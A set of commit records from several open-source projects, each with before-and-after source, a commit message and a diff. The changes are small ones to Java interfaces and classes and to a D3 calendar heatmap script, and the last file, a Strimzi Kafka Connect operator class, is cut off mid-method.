/* * Copyright 2006 Wyona * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.wyona.org/licenses/APACHE-LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.wyona.yanel.core.api.attributes; import javax.servlet.http.HttpServletRequest; import org.wyona.yanel.core.api.attributes.CreatableV1; import java.util.HashMap; /** * DEV (not released yet), please be aware that this interface still might change ... */ public interface CreatableV2 extends CreatableV1 { public static String TYPE_UPLOAD = "type_upload"; public static String TYPE_STRING = "type_string"; public static String TYPE_SELECT = "type_select"; public static String TYPE_PASSWORD = "type_password"; /** * Get property type which is intended to be used for the different types of (XHTML) input fields, e.g. TYPE_UPLOAD, TYPE_STRING (also see CreatableV1.getPropertyNames() */ public String getPropertyType(String propertyName); /** * Creates the resource */ public void create(HttpServletRequest request); /** * Get resource configuration properties which shall be used for the new resource configuration of the new resource */ public HashMap createRTIProperties(HttpServletRequest request); /** * Allows overwriting the name for the new resource which is suggested by Yanel or rather by the user input. This is useful if one wants to dynamically generate names which are for instance based on a timestamp. Return null if the resource shall not be associated with a resource configuration. This can useful for resources which are used "internally", e.g. the Yanel-User resource. */ public String getCreateName(String suggestedName); }
src/core/java/org/wyona/yanel/core/api/attributes/CreatableV2.java
/* * Copyright 2006 Wyona * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.wyona.org/licenses/APACHE-LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.wyona.yanel.core.api.attributes; import javax.servlet.http.HttpServletRequest; import org.wyona.yanel.core.Path; import org.wyona.yanel.core.api.attributes.CreatableV1; import java.util.HashMap; /** * DEV (not released yet), please be aware that this interface still might change ... */ public interface CreatableV2 extends CreatableV1 { public static String TYPE_UPLOAD = "type_upload"; public static String TYPE_STRING = "type_string"; public static String TYPE_SELECT = "type_select"; public static String TYPE_PASSWORD = "type_password"; /** * Get property type which is intended to be used for the different types of (XHTML) input fields, e.g. TYPE_UPLOAD, TYPE_STRING (also see CreatableV1.getPropertyNames() */ public String getPropertyType(String propertyName); /** * Creates the resource */ public void create(HttpServletRequest request); /** * Get resource configuration properties which shall be used for the new resource configuration of the new resource */ public HashMap createRTIProperties(HttpServletRequest request); /** * Allows overwriting the name for the new resource which is suggested by Yanel or rather by the user input. This is useful if one wants to dynamically generate names which are for instance based on a timestamp. Return null if the resource shall not be associated with a resource configuration. This can useful for resources which are used "internally", e.g. the Yanel-User resource. */ public String getCreateName(String suggestedName); }
obsolete import removed
src/core/java/org/wyona/yanel/core/api/attributes/CreatableV2.java
obsolete import removed
<ide><path>rc/core/java/org/wyona/yanel/core/api/attributes/CreatableV2.java <ide> package org.wyona.yanel.core.api.attributes; <ide> <ide> import javax.servlet.http.HttpServletRequest; <del> <del>import org.wyona.yanel.core.Path; <ide> import org.wyona.yanel.core.api.attributes.CreatableV1; <del> <ide> import java.util.HashMap; <ide> <ide> /**
JavaScript
apache-2.0
c8a93a81cb0ce4fd4cfaf434eb13054a2189fc9d
0
jhfjhfj1/github_io_source,jhfjhfj1/github_io_source,jhfjhfj1/github_io_source
var data_array={ "20160426":7, "20160426":6, "20160425":6, "20160424":1.5, "20160423":0.5, "20160422":3, "20160421":7, "20160420":7, "20160419":3, "20160418":7, "20160417":7, "20160416":0, "20160415":5.5, "20160414":7, "20160413":7, "20160412":3, "20160411":7, "20160410":5, "20160409":2, "20160408":7, "20160407":7, "20160406":7, "20160405":7, "20160404":7, "20160403":0, "20160402":2.5, "20160401":7, "20160331":7, "20160330":7, "20160329":7, "20160328":7, "20160327":4.5, "20160326":2, "20160325":5.5, "20160324":5, "20160323":4, "20160322":2.5, "20160321":5.5, "20160320":2, "20160319":0.5, "20160318":6, "20160317":0, "20160316":0, "20160315":1.5, "20160314":0, "20160313":2, "20160312":2, "20160311":0, "20160310":5, "20160309":1, "20160308":0, "20160307":5, "20160306":7, "20160305":3, "20160304":6, "20160303":3, "20160302":6, "20160301":7, "20160229":7, "20160228":7, "20160227":3, "20160226":2, "20160225":2.5, "20160224":5.5, "20160223":5, "20160222":7, "20160221":3.5, "20160220":3, "20160219":7, "20160218":7, "20160217":6, "20160216":5.5, "20160215":6, "20160214":3.5, "20160213":0, "20160212":4, "20160211":5, "20160210":7, "20160209":6, "20160208":5, "20160207":0, "20160206":0, "20160205":3, "20160204":5, "20160203":5, "20160202":4, "20160201":6, "20160131":3, "20160130":0, "20160129":7, "20160128":7, "20160127":6.5, "20160126":5, "20160125":7, "20160124":3, "20160123":0, "20160122":7, "20160121":7, "20160120":7, "20160119":6, "20160118":5, "20160117":0, "20160116":1, "20160115":4, "20160114":5, "20160113":5, "20160112":5, "20160111":5, "20160110":3, "20160109":0, "20160108":5.5, "20160107":5, "20160106":5, "20160105":5, "20160104":4.5, "20160103":0, "20160102":2, "20160101":0, "20151231":0, "20151230":1.5, "20151229":2, "20151228":2, "20151227":3.5, "20151226":1.5, "20151225":0, "20151224":0, "20151223":2.5, "20151222":3, "20151221":2, "20151220":4, "20151219":2, "20151218":4, "20151217":4.5, "20151216":4, "20151215":4, "20151214":5, "20151213":4, "20151212":4, "20151211":4.5, "20151210":7, "20151209":6, "20151208":5, "20151207":7, "20151206":4, "20151205":7, "20151204":4, "20151203":5.5, "20151202":6, "20151201":4.5, "20151130":5, "20151129":4, "20151128":4 }; var width = 900, height = 120, cellSize = 15; // cell size month = ['Jan','Feb','Mar','Apr','May','Jun','Jul','Aug','Sep','Oct','Nov','Dec'] color = ["#eee","#d6e685","#8cc665","#44a340","#1e6823"]; range = [0,4,5,7]; var day = d3.time.format("%w"), week = d3.time.format("%U"), percent = d3.format(".1%"), format = d3.time.format("%Y%m%d"); parseDate = d3.time.format("%Y%m%d").parse; var svg = d3.select(".calender-map").selectAll("svg") .data(d3.range(2015, 2017)) .enter().append("svg") .attr("width", '100%') .attr("data-height", '0.5678') .attr("viewBox",'0 0 ' + width + ' ' + height) .append("g") .attr("transform", "translate(" + ((width - cellSize * 53) / 2) + "," + (height - cellSize * 7 - 1) + ")"); svg.append("text") .attr("transform", "translate(-10," + cellSize * 3.5 + ")rotate(-90)") .style("text-anchor", "middle") .text(function(d) { return d; }); var rect = svg.selectAll(".day") .data(function(d) { return d3.time.days(new Date(d, 0, 1), new Date(d + 1, 0, 1)); }) .enter() .append("rect") .attr("class", "day") .attr("width", cellSize) .attr("height", cellSize) .attr("x", function(d) { return week(d) * cellSize; }) .attr("y", function(d) { return day(d) * cellSize; }) .attr("fill",'#fff') .datum(format); var legend = svg.selectAll(".legend") .data(month) .enter().append("g") .attr("class", "legend") .attr("transform", 
function(d, i) { return "translate(" + (((i+1) * 50)+8) + ",0)"; }); svg.selectAll(".month") .data(function(d) { return d3.time.months(new Date(d, 0, 1), new Date(d + 1, 0, 1)); }) .enter().append("path") .attr("class", "month") .attr("d", monthPath); function getRange(d) { for (i = 1; i < range.length; i++) { if (d < range[i]) return i; } return -1; } function getColor(d) { if (d == 0) return color[0]; if (d >= range[range.length - 1]) return color[range.length]; index = getRange(d); change = d3.scale.linear().range([color[index - 1], color[index]]) .domain([range[index - 1], range[index]]) return change(d) } rect .attr("fill", function(d) {if (isNaN(data_array[d])) return color[0]; return getColor(data_array[d]); }) .attr("data-title", function(d) { if (isNaN(data_array[d])) ret = "No record on "; else ret = data_array[d] + " hours on "; return ret + month[parseDate(d).getMonth()] + ". " + parseDate(d).getDate()}); d3.csv("",function() { $("rect").tooltip({container: 'body'}); }); function numberWithCommas(x) { x = x.toString(); var pattern = /(-?\d+)(\d{3})/; while (pattern.test(x)) x = x.replace(pattern, "$1,$2"); return x; } function monthPath(t0) { var t1 = new Date(t0.getFullYear(), t0.getMonth() + 1, 0), d0 = +day(t0), w0 = +week(t0), d1 = +day(t1), w1 = +week(t1); return "M" + (w0 + 1) * cellSize + "," + d0 * cellSize + "H" + w0 * cellSize + "V" + 7 * cellSize + "H" + w1 * cellSize + "V" + (d1 + 1) * cellSize + "H" + (w1 + 1) * cellSize + "V" + 0 + "H" + (w0 + 1) * cellSize + "Z"; }
home/js/calendermap.js
var data_array={ "20160425":6, "20160424":1.5, "20160423":0.5, "20160422":3, "20160421":7, "20160420":7, "20160419":3, "20160418":7, "20160417":7, "20160416":0, "20160415":5.5, "20160414":7, "20160413":7, "20160412":3, "20160411":7, "20160410":5, "20160409":2, "20160408":7, "20160407":7, "20160406":7, "20160405":7, "20160404":7, "20160403":0, "20160402":2.5, "20160401":7, "20160331":7, "20160330":7, "20160329":7, "20160328":7, "20160327":4.5, "20160326":2, "20160325":5.5, "20160324":5, "20160323":4, "20160322":2.5, "20160321":5.5, "20160320":2, "20160319":0.5, "20160318":6, "20160317":0, "20160316":0, "20160315":1.5, "20160314":0, "20160313":2, "20160312":2, "20160311":0, "20160310":5, "20160309":1, "20160308":0, "20160307":5, "20160306":7, "20160305":3, "20160304":6, "20160303":3, "20160302":6, "20160301":7, "20160229":7, "20160228":7, "20160227":3, "20160226":2, "20160225":2.5, "20160224":5.5, "20160223":5, "20160222":7, "20160221":3.5, "20160220":3, "20160219":7, "20160218":7, "20160217":6, "20160216":5.5, "20160215":6, "20160214":3.5, "20160213":0, "20160212":4, "20160211":5, "20160210":7, "20160209":6, "20160208":5, "20160207":0, "20160206":0, "20160205":3, "20160204":5, "20160203":5, "20160202":4, "20160201":6, "20160131":3, "20160130":0, "20160129":7, "20160128":7, "20160127":6.5, "20160126":5, "20160125":7, "20160124":3, "20160123":0, "20160122":7, "20160121":7, "20160120":7, "20160119":6, "20160118":5, "20160117":0, "20160116":1, "20160115":4, "20160114":5, "20160113":5, "20160112":5, "20160111":5, "20160110":3, "20160109":0, "20160108":5.5, "20160107":5, "20160106":5, "20160105":5, "20160104":4.5, "20160103":0, "20160102":2, "20160101":0, "20151231":0, "20151230":1.5, "20151229":2, "20151228":2, "20151227":3.5, "20151226":1.5, "20151225":0, "20151224":0, "20151223":2.5, "20151222":3, "20151221":2, "20151220":4, "20151219":2, "20151218":4, "20151217":4.5, "20151216":4, "20151215":4, "20151214":5, "20151213":4, "20151212":4, "20151211":4.5, "20151210":7, "20151209":6, "20151208":5, "20151207":7, "20151206":4, "20151205":7, "20151204":4, "20151203":5.5, "20151202":6, "20151201":4.5, "20151130":5, "20151129":4, "20151128":4 }; var width = 900, height = 120, cellSize = 15; // cell size month = ['Jan','Feb','Mar','Apr','May','Jun','Jul','Aug','Sep','Oct','Nov','Dec'] color = ["#eee","#d6e685","#8cc665","#44a340","#1e6823"]; range = [0,4,5,7]; var day = d3.time.format("%w"), week = d3.time.format("%U"), percent = d3.format(".1%"), format = d3.time.format("%Y%m%d"); parseDate = d3.time.format("%Y%m%d").parse; var svg = d3.select(".calender-map").selectAll("svg") .data(d3.range(2015, 2017)) .enter().append("svg") .attr("width", '100%') .attr("data-height", '0.5678') .attr("viewBox",'0 0 ' + width + ' ' + height) .append("g") .attr("transform", "translate(" + ((width - cellSize * 53) / 2) + "," + (height - cellSize * 7 - 1) + ")"); svg.append("text") .attr("transform", "translate(-10," + cellSize * 3.5 + ")rotate(-90)") .style("text-anchor", "middle") .text(function(d) { return d; }); var rect = svg.selectAll(".day") .data(function(d) { return d3.time.days(new Date(d, 0, 1), new Date(d + 1, 0, 1)); }) .enter() .append("rect") .attr("class", "day") .attr("width", cellSize) .attr("height", cellSize) .attr("x", function(d) { return week(d) * cellSize; }) .attr("y", function(d) { return day(d) * cellSize; }) .attr("fill",'#fff') .datum(format); var legend = svg.selectAll(".legend") .data(month) .enter().append("g") .attr("class", "legend") .attr("transform", function(d, i) { return 
"translate(" + (((i+1) * 50)+8) + ",0)"; }); svg.selectAll(".month") .data(function(d) { return d3.time.months(new Date(d, 0, 1), new Date(d + 1, 0, 1)); }) .enter().append("path") .attr("class", "month") .attr("d", monthPath); function getRange(d) { for (i = 1; i < range.length; i++) { if (d < range[i]) return i; } return -1; } function getColor(d) { if (d == 0) return color[0]; if (d >= range[range.length - 1]) return color[range.length]; index = getRange(d); change = d3.scale.linear().range([color[index - 1], color[index]]) .domain([range[index - 1], range[index]]) return change(d) } rect .attr("fill", function(d) {if (isNaN(data_array[d])) return color[0]; return getColor(data_array[d]); }) .attr("data-title", function(d) { if (isNaN(data_array[d])) ret = "No record on "; else ret = data_array[d] + " hours on "; return ret + month[parseDate(d).getMonth()] + ". " + parseDate(d).getDate()}); d3.csv("",function() { $("rect").tooltip({container: 'body'}); }); function numberWithCommas(x) { x = x.toString(); var pattern = /(-?\d+)(\d{3})/; while (pattern.test(x)) x = x.replace(pattern, "$1,$2"); return x; } function monthPath(t0) { var t1 = new Date(t0.getFullYear(), t0.getMonth() + 1, 0), d0 = +day(t0), w0 = +week(t0), d1 = +day(t1), w1 = +week(t1); return "M" + (w0 + 1) * cellSize + "," + d0 * cellSize + "H" + w0 * cellSize + "V" + 7 * cellSize + "H" + w1 * cellSize + "V" + (d1 + 1) * cellSize + "H" + (w1 + 1) * cellSize + "V" + 0 + "H" + (w0 + 1) * cellSize + "Z"; }
tracker
home/js/calendermap.js
tracker
<ide><path>ome/js/calendermap.js <ide> var data_array={ <add>"20160426":7, <add>"20160426":6, <ide> "20160425":6, <ide> "20160424":1.5, <ide> "20160423":0.5,
Java
apache-2.0
0af89702f6a188303ce33487ed75bb7259fd4597
0
weld/core,manovotn/core,antoinesd/weld-core,antoinesd/weld-core,manovotn/core,weld/core,antoinesd/weld-core,manovotn/core
/* * JBoss, Home of Professional Open Source * Copyright 2008, Red Hat Middleware LLC, and individual contributors * by the @authors tag. See the copyright.txt in the distribution for a * full listing of individual contributors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * http://www.apache.org/licenses/LICENSE-2.0 * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.jboss.webbeans.ejb; import javax.annotation.PostConstruct; import javax.annotation.PreDestroy; import javax.interceptor.InvocationContext; import javax.webbeans.manager.Bean; import org.jboss.webbeans.CurrentManager; import org.jboss.webbeans.bean.EnterpriseBean; /** * Interceptor for handling EJB post-construct tasks * * @author Pete Muir */ public class SessionBeanInterceptor { /** * Gets the underlying target and calls the post-construct method * * @param invocationContext The invocation context * @throws Exception */ @PostConstruct public void postConstruct(InvocationContext invocationContext) throws Exception { EnterpriseBean<Object> enterpriseBean = getBean(invocationContext); if (enterpriseBean != null) { enterpriseBean.postConstruct(invocationContext.getTarget()); } invocationContext.proceed(); } /** * Gets the underlying target and calls the pre-destroy method * * @param invocationContext The invocation context * @throws Exception */ @PreDestroy public void preDestroy(InvocationContext invocationContext) throws Exception { EnterpriseBean<Object> enterpriseBean = getBean(invocationContext); if (enterpriseBean != null) { enterpriseBean.preDestroy(invocationContext.getTarget()); } invocationContext.proceed(); } /** * Gets a bean based on the target in the invocation context * * @param invocationContext The invocation context * @return The found bean or null if the bean was not an enterprise bean */ @SuppressWarnings("unchecked") private static EnterpriseBean<Object> getBean(InvocationContext invocationContext) { Class<?> beanClass = invocationContext.getTarget().getClass(); Bean<?> bean = CurrentManager.rootManager().getBeanMap().get(beanClass); if (bean instanceof EnterpriseBean) { return (EnterpriseBean<Object>) bean; } else { return null; } } }
webbeans-ri/src/main/java/org/jboss/webbeans/ejb/SessionBeanInterceptor.java
/* * JBoss, Home of Professional Open Source * Copyright 2008, Red Hat Middleware LLC, and individual contributors * by the @authors tag. See the copyright.txt in the distribution for a * full listing of individual contributors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * http://www.apache.org/licenses/LICENSE-2.0 * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.jboss.webbeans.ejb; import javax.annotation.PostConstruct; import javax.annotation.PreDestroy; import javax.interceptor.InvocationContext; import javax.webbeans.manager.Bean; import org.jboss.webbeans.CurrentManager; import org.jboss.webbeans.bean.EnterpriseBean; /** * Interceptor for handling EJB post-construct tasks * * @author Pete Muir */ public class SessionBeanInterceptor { /** * Gets the underlying target and calls the post-construct method * * @param invocationContext The invocation context */ @PostConstruct public void postConstruct(InvocationContext invocationContext) { EnterpriseBean<Object> enterpriseBean = getBean(invocationContext); if (enterpriseBean != null) { enterpriseBean.postConstruct(invocationContext.getTarget()); } } /** * Gets the underlying target and calls the pre-destroy method * * @param invocationContext The invocation context */ @PreDestroy public void preDestroy(InvocationContext invocationContext) { EnterpriseBean<Object> enterpriseBean = getBean(invocationContext); if (enterpriseBean != null) { enterpriseBean.preDestroy(invocationContext.getTarget()); } } /** * Gets a bean based on the target in the invocation context * * @param invocationContext The invocation context * @return The found bean or null if the bean was not an enterprise bean */ @SuppressWarnings("unchecked") private static EnterpriseBean<Object> getBean(InvocationContext invocationContext) { Class<?> beanClass = invocationContext.getTarget().getClass(); Bean<?> bean = CurrentManager.rootManager().getBeanMap().get(beanClass); if (bean instanceof EnterpriseBean) { return (EnterpriseBean<Object>) bean; } else { return null; } } }
WBRI-91 git-svn-id: 811cd8a17a8c3c0c263af499002feedd54a892d0@781 1c488680-804c-0410-94cd-c6b725194a0e
webbeans-ri/src/main/java/org/jboss/webbeans/ejb/SessionBeanInterceptor.java
WBRI-91
<ide><path>ebbeans-ri/src/main/java/org/jboss/webbeans/ejb/SessionBeanInterceptor.java <ide> * Gets the underlying target and calls the post-construct method <ide> * <ide> * @param invocationContext The invocation context <add> * @throws Exception <ide> */ <ide> @PostConstruct <del> public void postConstruct(InvocationContext invocationContext) <add> public void postConstruct(InvocationContext invocationContext) throws Exception <ide> { <ide> EnterpriseBean<Object> enterpriseBean = getBean(invocationContext); <ide> if (enterpriseBean != null) <ide> { <ide> enterpriseBean.postConstruct(invocationContext.getTarget()); <ide> } <add> invocationContext.proceed(); <ide> } <ide> <ide> /** <ide> * Gets the underlying target and calls the pre-destroy method <ide> * <ide> * @param invocationContext The invocation context <add> * @throws Exception <ide> */ <ide> @PreDestroy <del> public void preDestroy(InvocationContext invocationContext) <add> public void preDestroy(InvocationContext invocationContext) throws Exception <ide> { <ide> EnterpriseBean<Object> enterpriseBean = getBean(invocationContext); <ide> if (enterpriseBean != null) <ide> { <ide> enterpriseBean.preDestroy(invocationContext.getTarget()); <ide> } <add> invocationContext.proceed(); <ide> } <ide> <ide> /**
Java
apache-2.0
4fc4b341f70144f2954d1d0ea94d2da4103220a6
0
OpenConext/OpenConext-teams,OpenConext/OpenConext-teams,OpenConext/OpenConext-teams
/* * Copyright 2011 SURFnet bv, The Netherlands * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package nl.surfnet.coin.teams.util; import nl.surfnet.coin.teams.control.AbstractControllerTest; import org.junit.Ignore; import org.junit.Test; import static org.junit.Assert.assertEquals; import static org.mockito.Mockito.mock; import static org.mockito.Mockito.when; /** * */ public class VOUtilTest extends AbstractControllerTest { private final static String VONAME = "testvo.nl"; private final static String DEFAULTSTEM = "nl:surfnet:diensten"; private final static String VOSTEMPREFIX = "nl:surfnet:vo"; /** * Mock the getVOName. * * @throws Exception */ @Test @Ignore //TODO fix test. Mock Static method VOInterceptor.getUserVo Otherwise the outcome of this test is not predictable! public void testGetVoName() throws Exception { VOUtil voUtil = new VOUtil(); TeamEnvironment environment = mock(TeamEnvironment.class); when(environment.getVoStemPrefix()).thenReturn(VOSTEMPREFIX); when(environment.getDefaultStemName()).thenReturn(DEFAULTSTEM); autoWireMock(voUtil, environment, TeamEnvironment.class); String stemName = voUtil.getStemName(getRequest()); assertEquals("nl:surfnet:diensten", stemName); } }
coin-teams-war/src/test/java/nl/surfnet/coin/teams/util/VOUtilTest.java
/* * Copyright 2011 SURFnet bv, The Netherlands * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package nl.surfnet.coin.teams.util; import nl.surfnet.coin.teams.control.AbstractControllerTest; import static org.junit.Assert.assertEquals; import static org.mockito.Mockito.mock; import static org.mockito.Mockito.when; /** * */ public class VOUtilTest extends AbstractControllerTest { private final static String VONAME = "testvo.nl"; private final static String DEFAULTSTEM = "nl:surfnet:diensten"; private final static String VOSTEMPREFIX = "nl:surfnet:vo"; /** * Mock the getVOName. * * @throws Exception */ //@Test //TODO fix test. Mock Static method VOInterceptor.getUserVo Otherwise the outcome of this test is not predictable! public void testGetVoName() throws Exception { VOUtil voUtil = new VOUtil(); TeamEnvironment environment = mock(TeamEnvironment.class); when(environment.getVoStemPrefix()).thenReturn(VOSTEMPREFIX); when(environment.getDefaultStemName()).thenReturn(DEFAULTSTEM); autoWireMock(voUtil, environment, TeamEnvironment.class); String stemName = voUtil.getStemName(getRequest()); assertEquals("nl:surfnet:diensten", stemName); } }
Fix test.. add @Ignore git-svn-id: 7f9817d80667deac6042fd45474745cdc98fb3cd@1496 3364c4cd-9065-40b6-aee7-261f90ce6533
coin-teams-war/src/test/java/nl/surfnet/coin/teams/util/VOUtilTest.java
Fix test.. add @Ignore
<ide><path>oin-teams-war/src/test/java/nl/surfnet/coin/teams/util/VOUtilTest.java <ide> package nl.surfnet.coin.teams.util; <ide> <ide> import nl.surfnet.coin.teams.control.AbstractControllerTest; <add>import org.junit.Ignore; <add>import org.junit.Test; <ide> <ide> import static org.junit.Assert.assertEquals; <ide> import static org.mockito.Mockito.mock; <ide> * <ide> * @throws Exception <ide> */ <del> //@Test <add> @Test <add> @Ignore <ide> //TODO fix test. Mock Static method VOInterceptor.getUserVo Otherwise the outcome of this test is not predictable! <ide> public void testGetVoName() throws Exception { <ide>
Java
mit
34b3b8d6478b4eb6c627ca336fb7c6eff6253916
0
douggie/XChange,ww3456/XChange,timmolter/XChange,npomfret/XChange,andre77/XChange,stachon/XChange,Panchen/XChange,LeonidShamis/XChange,gaborkolozsy/XChange,evdubs/XChange,nopy/XChange,anwfr/XChange,TSavo/XChange,chrisrico/XChange
package org.knowm.xchange.bitfinex.v1.dto.trade; import com.fasterxml.jackson.annotation.JsonProperty; import com.fasterxml.jackson.annotation.JsonRawValue; public class BitfinexOfferStatusRequest { @JsonProperty("request") protected String request; @JsonProperty("nonce") protected String nonce; @JsonProperty("order_id") @JsonRawValue private long orderId; public BitfinexOfferStatusRequest(String nonce, long orderId) { this.request = "/v1/offer/status"; this.orderId = orderId; this.nonce = nonce; } public String getOrderId() { return String.valueOf(orderId); } }
xchange-bitfinex/src/main/java/org/knowm/xchange/bitfinex/v1/dto/trade/BitfinexOfferStatusRequest.java
package org.knowm.xchange.bitfinex.v1.dto.trade; import com.fasterxml.jackson.annotation.JsonProperty; import com.fasterxml.jackson.annotation.JsonRawValue; public class BitfinexOfferStatusRequest { @JsonProperty("request") protected String request; @JsonProperty("nonce") protected String nonce; @JsonProperty("order_id") @JsonRawValue private int orderId; public BitfinexOfferStatusRequest(String nonce, int orderId) { this.request = "/v1/offer/status"; this.orderId = orderId; this.nonce = nonce; } public String getOrderId() { return String.valueOf(orderId); } }
Update BitfinexOfferStatusRequest.java
xchange-bitfinex/src/main/java/org/knowm/xchange/bitfinex/v1/dto/trade/BitfinexOfferStatusRequest.java
Update BitfinexOfferStatusRequest.java
<ide><path>change-bitfinex/src/main/java/org/knowm/xchange/bitfinex/v1/dto/trade/BitfinexOfferStatusRequest.java <ide> <ide> @JsonProperty("order_id") <ide> @JsonRawValue <del> private int orderId; <add> private long orderId; <ide> <del> public BitfinexOfferStatusRequest(String nonce, int orderId) { <add> public BitfinexOfferStatusRequest(String nonce, long orderId) { <ide> <ide> this.request = "/v1/offer/status"; <ide> this.orderId = orderId;
Java
apache-2.0
e52963c3f2c99a5433a553cabc75b187ad9b0091
0
scholzj/barnabas,ppatierno/kaas,scholzj/barnabas,ppatierno/kaas
/* * Copyright Strimzi authors. * License: Apache License 2.0 (see the file LICENSE or http://apache.org/licenses/LICENSE-2.0.html). */ package io.strimzi.operator.cluster.operator.assembly; import io.fabric8.kubernetes.api.model.Doneable; import io.fabric8.kubernetes.api.model.HasMetadata; import io.fabric8.kubernetes.api.model.LabelSelectorBuilder; import io.fabric8.kubernetes.api.model.LocalObjectReference; import io.fabric8.kubernetes.client.CustomResource; import io.fabric8.kubernetes.client.CustomResourceList; import io.fabric8.kubernetes.client.KubernetesClient; import io.fabric8.kubernetes.client.KubernetesClientException; import io.fabric8.kubernetes.client.Watcher; import io.fabric8.kubernetes.client.dsl.Resource; import io.fabric8.openshift.client.OpenShiftClient; import io.strimzi.api.kafka.KafkaConnectList; import io.strimzi.api.kafka.KafkaConnectS2IList; import io.strimzi.api.kafka.KafkaConnectorList; import io.strimzi.api.kafka.model.DoneableKafkaConnect; import io.strimzi.api.kafka.model.DoneableKafkaConnectS2I; import io.strimzi.api.kafka.model.DoneableKafkaConnector; import io.strimzi.api.kafka.model.KafkaConnect; import io.strimzi.api.kafka.model.KafkaConnectResources; import io.strimzi.api.kafka.model.KafkaConnectS2I; import io.strimzi.api.kafka.model.KafkaConnector; import io.strimzi.api.kafka.model.KafkaConnectorBuilder; import io.strimzi.api.kafka.model.KafkaConnectorSpec; import io.strimzi.api.kafka.model.status.HasStatus; import io.strimzi.api.kafka.model.status.KafkaConnectorStatus; import io.strimzi.api.kafka.model.status.Status; import io.strimzi.operator.PlatformFeaturesAvailability; import io.strimzi.operator.cluster.ClusterOperatorConfig; import io.strimzi.operator.cluster.model.ImagePullPolicy; import io.strimzi.operator.cluster.model.InvalidResourceException; import io.strimzi.operator.cluster.model.KafkaConnectCluster; import io.strimzi.operator.cluster.model.NoSuchResourceException; import io.strimzi.operator.cluster.model.StatusDiff; import io.strimzi.operator.cluster.operator.resource.ResourceOperatorSupplier; import io.strimzi.operator.common.AbstractOperator; import io.strimzi.operator.common.Annotations; import io.strimzi.operator.common.BackOff; import io.strimzi.operator.common.Reconciliation; import io.strimzi.operator.common.Util; import io.strimzi.operator.common.model.Labels; import io.strimzi.operator.common.operator.resource.ConfigMapOperator; import io.strimzi.operator.common.operator.resource.CrdOperator; import io.strimzi.operator.common.operator.resource.PodDisruptionBudgetOperator; import io.strimzi.operator.common.operator.resource.ServiceAccountOperator; import io.strimzi.operator.common.operator.resource.ServiceOperator; import io.strimzi.operator.common.operator.resource.StatusUtils; import io.vertx.core.CompositeFuture; import io.vertx.core.Future; import io.vertx.core.Promise; import io.vertx.core.Vertx; import io.vertx.core.json.JsonObject; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; import java.util.ArrayList; import java.util.HashSet; import java.util.List; import java.util.Map; import java.util.Optional; import java.util.Set; import java.util.function.BiFunction; import java.util.function.Function; import java.util.stream.Collectors; import java.util.stream.Stream; import static java.util.Collections.emptyMap; public abstract class AbstractConnectOperator<C extends KubernetesClient, T extends CustomResource, L extends CustomResourceList<T>, D extends Doneable<T>, R extends Resource<T, D>> 
extends AbstractOperator<T, CrdOperator<C, T, L, D>> { private static final Logger log = LogManager.getLogger(AbstractConnectOperator.class.getName()); public static final String STRIMZI_IO_USE_CONNECTOR_RESOURCES = "strimzi.io/use-connector-resources"; private final CrdOperator<KubernetesClient, KafkaConnector, KafkaConnectorList, DoneableKafkaConnector> connectorOperator; private final Function<Vertx, KafkaConnectApi> connectClientProvider; protected final ImagePullPolicy imagePullPolicy; protected final ConfigMapOperator configMapOperations; protected final ServiceOperator serviceOperations; protected final PodDisruptionBudgetOperator podDisruptionBudgetOperator; protected final List<LocalObjectReference> imagePullSecrets; protected final long operationTimeoutMs; protected final PlatformFeaturesAvailability pfa; protected final ServiceAccountOperator serviceAccountOperations; public AbstractConnectOperator(Vertx vertx, PlatformFeaturesAvailability pfa, String kind, CrdOperator<C, T, L, D> resourceOperator, ResourceOperatorSupplier supplier, ClusterOperatorConfig config, Function<Vertx, KafkaConnectApi> connectClientProvider) { super(vertx, kind, resourceOperator); this.connectorOperator = supplier.kafkaConnectorOperator; this.connectClientProvider = connectClientProvider; this.configMapOperations = supplier.configMapOperations; this.serviceOperations = supplier.serviceOperations; this.serviceAccountOperations = supplier.serviceAccountOperations; this.podDisruptionBudgetOperator = supplier.podDisruptionBudgetOperator; this.imagePullPolicy = config.getImagePullPolicy(); this.imagePullSecrets = config.getImagePullSecrets(); this.operationTimeoutMs = config.getOperationTimeoutMs(); this.pfa = pfa; } @Override protected Future<Boolean> delete(Reconciliation reconciliation) { // When deleting KafkaConnect we need to update the status of all selected KafkaConnector return connectorOperator.listAsync(reconciliation.namespace(), Labels.forCluster(reconciliation.name())).compose(connectors -> { List<Future> connectorFutures = new ArrayList<>(); for (KafkaConnector connector : connectors) { 